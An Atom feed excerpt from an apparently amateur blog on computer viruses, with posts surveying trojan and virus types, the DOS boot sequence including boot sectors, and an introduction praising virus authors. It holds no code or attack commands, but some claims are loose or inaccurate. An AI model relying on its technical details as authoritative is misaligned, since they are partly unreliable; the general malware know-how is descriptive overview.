&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;Password Sending 	Trojans&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;             These type of Trojans possesses great threats even today. The purpose of these Trojans is to send the password stored in the cached memory. They can also steal the passwords as you enter the passwords. They then send it to the specified e-mail without the users knowledge. Passwords of the restricted sites, e-mail, messaging services and FTP services come under the threat of these Trojans.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;Keyloggers&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;                   These Trojans log victim's keystroke end send the log files to the attacker. They can  be active in two modes: one in online mode and the other in the offline mode. The attacker can get several information including the passwords. The logs are send in the daily basis.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;Destructive  	&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;                   The only function of these Trojans is to destroy all files in the core system. They performs the destructive work according to the will of the programmer or can be programmed to work as a logic bomb which can be activated in a special date or time.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;Denial of Service (DoS) 	Attack Trojans&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;                 The main aim of this kind of Trojans is to reduce the bandwidth of the victims machine by increasing the net traffic. This makes the internet connection too overloaded to let the user to visit a website or download anything. One of the variation of this type of Trojans is the mail-bomb Trojan, whose main aim aim is to infect maximum systems as possible and simultaneously attack a specific e-mail address with random subjects and content that cannot be filtered. However today the e-mail service providers use advanced filters to filter out these malicious softwares upto an extend.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;Proxy/Wingate Trojans&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt;These Trojans turn the victim's system into a Proxy/Wingate server. Thus the victim's machine will be opened to many other systems connected to the network. The attacker can easily use this victim's system to anonymously browse in to the restricted sites and access various risky internet services. The attacker can register domains or access pornographic sites with stolen credit card number or can perform several similar illegal activities. &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;FTP Trojans&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;These Trojans are commonly very simple. But most of them does not exist today. It does nothing but opens the port for the FTP transfer that is port 21. So everyone connected to the network can access files from the victim's machine. Today the systems are password protected so that only attacker can connect to the computer.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;Software Detection Killers&lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;The main aim of these Trojans is to kill the softwares or firewalls that protect your computer from malicious softwares. This will reduces your computer's defense to the malicious softwares and becomes easily vulnerable to attacks. These Trojans exists even today. Some anti-virus asks the displays a confirmation message when they are to be uninstalled.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;Worms&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;Computer worms are programs that reproduce themselves and run independently. They can travel across the network connections They are platform independent, so they can attack system running on any operating system. The difference between a worm and a virus is the method in which they reproduce and spread. A virus is dependent on a host file or a boot sector, and transfer of files between the machines to spread, while a worm can run completely independent and spread of its own through the network connections.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;         The security threat of worm is same as that of the viruses. Worms are capable of doing wide range of damages such as destroying essential files in the victim's computer, slowing it down to the maximum extend and even causes some of the essential programs to crash. Two famous worms are MS-Blaster and Sasser worms.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;Spyware&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin-bottom: 0in;" align="left"&gt;            Spyware is also an Adware (advertising-supported software). Advertising in shareware products is a way for shareware authors to make money, other than by selling it to the user. There are several large companies that offer to place banner ads in their products in exchange for a portion of the revenue from banner sales. If the user finds the banner annoying, there is usually an opinion to get rid of it by paying the license fee.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;                Unfortunately, the advertising companies often also install additional tracking software in your system that is continuously using your internet connection to send the statistical data back to the advertisers. Although the companies claims that they did not collect any personal information from the user so that he will be anonymous, the fact is that there is a server running in your computer that will send the information about you and your surfing habits to a remote location using the bandwidth of your internet connection.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;          Spyware slows down the speed of your internet connection. They also reduces the processing power of your computer. Sometimes unwanted pop ups will irritate the user. It also changes the settings of your browser like changing the home page or default search engines. Many people does not consider it as illegal. But unfortunately there is no way to get rid of such nuisance.  &lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;             &lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;                       &lt;/p&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7985260057354696823?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7985260057354696823/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/other-malicious-softwares.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7985260057354696823'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7985260057354696823'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/other-malicious-softwares.html' title='Other Malicious Softwares'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-2719863690446226412</id><published>2009-01-04T03:51:00.000-08:00</published><updated>2009-01-04T05:32:19.315-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='File viruses'/><category scheme='http://www.blogger.com/atom/ns#' term='Types of viruses'/><title type='text'>Types of viruses</title><content type='html'>&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;There are thousands of viruses today. More and more viruses are discovered nowadays. So its becoming difficult to detect and destroy new viruses. The new viruses are programmed in such a way that they can enter in to the computer memory without detecting by the anti viruses. So the anti virus companies are stepping up the security levels. There are different types of viruses nowadays. Some of them are given below.&lt;/p&gt; &lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt; &lt;ul style="font-weight: bold;"&gt;&lt;li&gt;File viruses (Parasitic Viruses)&lt;/li&gt;&lt;/ul&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;File viruses or parasitic viruses are a piece of code or application that is attached themselves to the other files that are executable or driver files or compressed files. They get activated when the host program is executed. After activation these viruses start spreading by latching themselves to many other files and thus they spread like a forest fire.  Then they start destruction to the data or loss of files or corruption of files. Most of the viruses of this type when activated enters in to the computer memory and searches for the other files which can be infected by them. It can even spread and infect the other systems that are shared with it.&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;       Besides spreading themselves these viruses perform destructive activities also. The destructive activity can be activated by means of a 'trigger'. The trigger may be the execution of the host file or the virus file by itself, otherwise the trigger may be some date or time. The date and time can be obtained from the system date and time. The trigger may be the number of times the virus has replicated or something similar to it. The examples of file viruses are:&lt;span style="font-style: italic;"&gt; Randex, Meve, MrKlunky, Casino, Boza, Tentacle, Win32/CIH.&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;" align="left"&gt;&lt;br /&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt; Boot Sector Viruses&lt;/li&gt;&lt;/ul&gt;They are also known as System Sector Viruses. Boot Sector Viruses infects the boot sector which is a crucial part of a computer system. The boot sector is where all information about the drive is stored, along with a program that helps the virus in loading into memory at the time of every booting. The Boot Strap Virus does not affects the files. First it moves or overwrites the original boot code, replacing it with infected boot codes. Then the virus will move the original boot sector information to another sector on the disk, marking that sector as a bad spot on the disk so it will not be used in the future. To be infected by this type of virus, you must boot the computer using an infected floppy disk. For example, if a user leaves an infected floppy disk in the disk drive and you reboot the computer, then you will bring the virus into the system. The inability to attack the files leads to their downfall. In the era when floppies where used these viruses spread like a wild fire. But the introduction of CDs reduced their spreading. However some of them still exists. The operating systems of today prevent them from activating. Examples of Boot Sector Viruses: &lt;span style="font-style: italic;"&gt;Joshi, Devil's Dance, V-Sign, Polyboot.B, AntiEXE.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Multi-Polymorphic Viruses&lt;/li&gt;&lt;/ul&gt;This type of virus affects both boot sectors and executable files. They can combine some of the characteristics of stealth and polymorphic viruses. These viruses spread through infected media and reside in the memory. They then move to the boot sector of the memory. From there it infect the executable files in the system and it spread across the system. Today also there are many multi-polymorphic viruses in existance. Example of &lt;span style="font-style: italic;"&gt;muli-polimorphic virus is Ywinz.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Macro Viruses&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;These kinds of viruses use an application's own macro programming language to distribute themselves. Macro viruses can infect Word files, as well as any other application that uses a programming language. These viruses infect documents, templates but not programs. When you open a document or a template that contains a macro virus, then the virus will spread to other documents and templates you may have on your system. For example, a macro virus can change, delete document contents, change settings in the Word environment, set a password, copy a DOS virus to the user's system and much more… Moreover, macro viruses have the potentiality of spreading across different platforms such as PC to Mac. Because they are programmed to work with the application than with the operating system. This makes them platform independent. If you are familiar with the Word macros you have on your system, you can look through the various macros for ones that you do not recognize. The first macro virus was written for Microsoft Word and was discovered back in August 1995. Today there are thousands of macro viruses exists.  Examples of types of macro viruses: &lt;span style="font-style: italic;"&gt;AAAZAO, AAAZFS, AutoOpen, FileSaveAs, PayLoad, Relax, Melissa.A, Bablas etc.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;For more information about Macro Viruses see &lt;a href="http://www.bu.edu/computing/virus/macro-protection.html"&gt;http://www.bu.edu/computing/virus/macro-protection.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;ul&gt;&lt;li&gt;Network Viruses&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: left;"&gt;&lt;span style=";font-family:times new roman;font-size:100%;"  &gt;&lt;span style="font-family:arial;"&gt;These viruses are capable of fast spreading through networks including LAN and internet. It is commonly transfered through shared drives and folders. Once it affects a system it searches for other vulerable systems and infects it. Examples of the Network viruses are:&lt;/span&gt;&lt;span style="font-style: italic;"&gt; Nimda, SQLSlammer.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;E-mail Viruses&lt;/li&gt;&lt;/ul&gt; These viruses are a form of macro virus that spreads itself to all the contacts in the address book. If any of the e-mail recipients opens the attachment of the infected mail, it spreads to the address book of the recipient and thus they spreads like a wild fire. Nowadays viruses are capable of infecting the system even if the infected mail is previewed in a window. Example of the e-mail viruses: &lt;span style="font-style: italic;"&gt;ILOVEYOU virus&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-2719863690446226412?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/2719863690446226412/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/types-of-viruses.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2719863690446226412'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2719863690446226412'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/types-of-viruses.html' title='Types of viruses'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-3192124958534637152</id><published>2008-12-26T08:45:00.000-08:00</published><updated>2008-12-27T00:32:01.717-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Viruses'/><category scheme='http://www.blogger.com/atom/ns#' term='bootstrap virus'/><category scheme='http://www.blogger.com/atom/ns#' term='Booting'/><category scheme='http://www.blogger.com/atom/ns#' term='bootstrap'/><category scheme='http://www.blogger.com/atom/ns#' term='bootloader'/><title type='text'>Booting</title><content type='html'>The booting procedure is described below.&lt;br /&gt;&lt;br /&gt;We all know booting is the process of loading of programs from the secondary storage devices like hard disks to the primary memory RAM. This does not occur in one step. It occurs through a series of steps. They are listed below:&lt;br /&gt;&lt;br /&gt;1. The first step in the process of booting is Power On Self Test (POST). During this stage the programs stored in the ROM of the computer checks whether the other programs were in the right order.&lt;br /&gt;2. The next stage is to set up the Interrupt Vector Table (IVT). This table contains interrupt number and the address of the corresponding interrupt service routine. When an interrupt is occurred the processor looks in to the IVT and gets the location of the interrupt service routine and executes the task specified by that interrupt service routine.&lt;br /&gt;3. In the third stage the system performs the RAM test. During RAM test the system calculates the maximum size of the RAM and stores it in the location 0x413 and 0x414. Thus we will get the maximum size of the RAM from the location 0x413 and 0x414.&lt;br /&gt;4. The next step is to initialize the standard equipments like keyboard, disc drives etc. The list of these equipments are stored in the memory location 0x410&lt;br /&gt;5. The next step is to initialize the non-standard equipments like hard disk drive. The computer checks for the non-standard equipments connected to the computer. If they were found they momentarily transfer control to ROM extension routines. After initializing the non-standard equipments the computer transforms the control back to the ROM startup routines.&lt;br /&gt;6. The system contains the RAM startup routine. The RAM startup routine reads the boot sequence from CMOS RAM. This is applicable only for the processors AT and above. For XT processors the boot sequence will always starts from A drive. This cannot be changed. But in the case of AT processors the boot sequence can be changed according to the need of the user.&lt;br /&gt;7. The system contains Bootstrap Loader whose purpose is to load the content of the side 0, track 0 and sector 1.&lt;br /&gt;&lt;br /&gt;From here we have to deal with two cases regarding the type of the processor.&lt;br /&gt;In the case of the XT processors booting starts loading the programs from the floppy drive then t the hard disk (from A drive then to C drive ). But in the case of the AT processor the boot sequence can be changed. Let us first look in to the case of the XT processor:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="color: rgb(51, 255, 255); font-weight: bold;"&gt;BOOTING FROM FLOPPY DISK&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;(i) The Bootstrap Loader is a short and primitive program, smart enough to move the head of the disk drive to track 0, and read the contents of the first physical sector of the disk into memory, at a predetermined location and pass control to it.&lt;br /&gt;&lt;br /&gt;The side 0, track 0, sector 1 of floppy disk contains Boot Parameters and Disk Bootstrap Program. Hence the Bootstrap Loader loads into memory and hands over the control to them.&lt;br /&gt;&lt;br /&gt;The first three bytes of the boot parameters contains the jump instruction. This instructions cause the control to jump to the Disk Bootstrap Program, bypassing the Boot Parameters which are placed after the jump instruction.&lt;br /&gt;&lt;br /&gt;The important job of the Disk Bootstrap Program is to load the file IO.SYS into the memory. But there is a problem in doing this. The Disk Bootstrap Program does not know the exact location of the file IO.SYS on the disk which depends upon the number of copies of the FAT on the disk, number of sectors occupied by each copy of FAT and a number of sectors occupied by the directory.&lt;br /&gt;These parameters vary from disk to disk.This is where the Boot Parameters come into rescue of Disk Bootstrap Program. Using the data in the Boot Parameters it calculates the exact location of the file IO.SYS. Once this location has been found out, the actual loading of Operating System into memory starts.&lt;br /&gt;&lt;br /&gt;(2)  The Disk Bootstrap Program first checks for the existance of the file IO.SYS. If the file is present the file is loaded into memory and passes control to it. If the fle is abscent then the familiar message is displayed:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-style: italic;"&gt;Non system disk. Insrt system disk and press any key&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;On inserting a disk containing the file and the&lt;span style="font-style: italic;"&gt; &lt;/span&gt;pressing a key, it loads the IO.SYS from the disk. As soon as IO.SYS is loaded, the Disk Bootstrap Program is removed from the memory.&lt;br /&gt;&lt;br /&gt;(3)  IO.SYS consists of two modules: -  Disk BIOS and SYSINIT. Let us discard the case of Disk BIOS for the time being. Lets go with SYSINIT. SYSINIT module loads the file MSDOS.SYS from disk into memory and passes control to it.&lt;br /&gt;&lt;br /&gt;(4)  MSDOS.SYS builds some internal data structures and work ares and then returns the control to SYSINIT.&lt;br /&gt;SYSINIT loads a file CONFIG.SYS file from the root directory of the floppy. The optional file can contain a variety of commands that enables the user to customize the working environment. For example, the user may specify the nmber of disk buffers, the maximum number of files that can be opened, etc. If it is found, the entire CONFIG.SYS file is loaded into memory and each command in it is executed one line at a time.&lt;br /&gt;&lt;br /&gt;(5)  SYSINIT then loads the Resident portion of the file COMMAND.COM into memory. Once the Resident portion is loaded, the SYSINIT module is discarded from the memory and the control is handed over to the Resdent portion.&lt;br /&gt;&lt;br /&gt;(6)  The Resident Portion of COMMAND.COM loads the Trancient Portion of COMMAND.COM into high end of memory. Here high end means the top of base memory. This high end may vary from computer to computer since different computers have different base memory sizes. The resident portion finds out the high end from the base memory size stored at locations 0x413 - 0x414 during the RAM test. The Transcient Portion of the COMMAND.COM executes the file AUTOEXEC.BAT, if it is present in the root directory.&lt;br /&gt;&lt;br /&gt;(7)  The Transcient Portion of COMMAND.COM finally displays the DOS prompt.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="color: rgb(51, 255, 255); font-weight: bold;"&gt;BOOTING FROM HARD DISK&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;In the case of Booting from hard disk also the steps from 1 - 7 remains the same. Continuing steps are given below:&lt;br /&gt;(1)  Since the capacity of the hard disk is huge we can use different Operating Systems. For this purpose we divide the whole portion into different logical partitions and install one or more Operating Systems in each partition. The information about where each partition begins and ends, the size of each partition, etc are stored in a partition table in side 0, track 0, sector 1. This sector also contains a Master Boot Program. The partition table is 64 bytes long. The partition table also indicates which is the bootable partition. The ROM Bootstrap Loading Program loads the partition table and the Master Boot program into memory and passes control to it.&lt;br /&gt;&lt;br /&gt;(2)  The Master boot program finds out which is the bootable partition, loads the boot sector (containing Boot Parameters and Disk Bootstrap Program) from the bootable partition and passes control to it.&lt;br /&gt;&lt;br /&gt;(3)  Once the Disk Bootstrap Program receives the control the rest of the booting procedure is same as in the case of booting from a floppy disk.&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-3192124958534637152?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/3192124958534637152/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2008/12/types-of-viruses_26.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3192124958534637152'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3192124958534637152'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2008/12/types-of-viruses_26.html' title='Booting'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-3948064850073716786</id><published>2008-12-18T07:41:00.000-08:00</published><updated>2008-12-18T07:43:36.186-08:00</updated><title type='text'>Introduction</title><content type='html'>You may have computers. While working with computers you may note several bad things happening in your computer. You may found that your .exe files are losing, word document is displaying unnecessary messages, your internet bandwidth becoming narrower, alert symbol in the system tray etc. When you ask your colleagues about this problem they have only one answer-“VIRUS”.&lt;br /&gt;&lt;br /&gt;Now let us browse in to the world of virus…….&lt;br /&gt;&lt;br /&gt;What is a virus?&lt;br /&gt;&lt;br /&gt;A virus is an executable file that is capable of replicating (copying itself). The viruses are programmed for destructive purposes like deleting files and data, reducing the bandwidth of the network medium etc. The size of most of the virus is in KB. This shows that the most of the virus were made by the brilliant programmers. Viruses are of different types and forms. They can latch to other files like .exe, .com etc. They have the capability to spread through the removable media like floppy disk, CDs, flash drives etc. Some have the capability to spread through the network. Most of the viruses are programmed in assembly language that results in its reduced size.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-3948064850073716786?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/3948064850073716786/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2008/12/introduction.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3948064850073716786'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3948064850073716786'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2008/12/introduction.html' title='Introduction'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry></feed>
